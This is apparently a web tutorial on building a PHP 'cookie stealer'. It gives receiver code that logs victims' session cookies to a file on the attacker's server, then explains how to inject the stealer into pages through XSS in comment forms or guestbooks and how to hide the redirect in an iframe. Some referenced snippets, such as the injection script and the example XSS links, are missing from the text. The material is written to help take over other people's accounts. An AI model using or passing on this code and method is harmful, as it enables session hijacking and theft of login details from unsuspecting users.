How to build a basic Cookie Stealer.
A cookie stealer is used to steal the SESSION data or cookie information such as login details of any unsuspecting victim. Once the link is visited, the cookie data of the user is taken and stored externally. They are then redirected to another page without knowing what has just happened. This cookie stealer will be made using PHP so a webhost supporting PHP will be needed.
Here is a sample receiver code for your PHP file:
$logFile = "cookieLog.txt";
$cookie = $_REQUEST["c"];
$handle = fopen($logFile, "a");
fwrite($handle, $cookie . "\n\n");
The code above takes a REQUEST parameter of c from either a HTTP POST or as a GET parameter from the URL
(/script.php?c=[Cookie Data]). The details are stored in a text log file although a database could also be used. Finally after logging the cookie data the script redirects the victim back to an external URL.
Again change the URL to fit the actual location and name of your PHP script.
If the code above is successfully injected into a page (e.g. through XSS) then as soon as the victim loads the page they will be redirected to your cookie stealer script. You could also load the URL into an iframe to avoid the redirection being noticed.
That's all there is to it, you have now built a successful cookie stealer.
How Cookie Stealers Are Successfully Used
The most common method of sucessfully embedding a cookie stealer into a webpage is either through an unfitered form such as a comment form or Guestbook that allows HTML to be injected into the page or through temporary or permanent XSS.
For more information on XSS, please read the XSS tutorial.
Using a similar example of a vulnerable search page where the URL is in the fotmat:
A temporary XSS link could be:
For better ways to obfuscate the link please read the XSS tutorial linked to above.
And that concludes this tutorial. Hopefully now you should be able to make a successful cookie stealer and avoid being a victim yourself.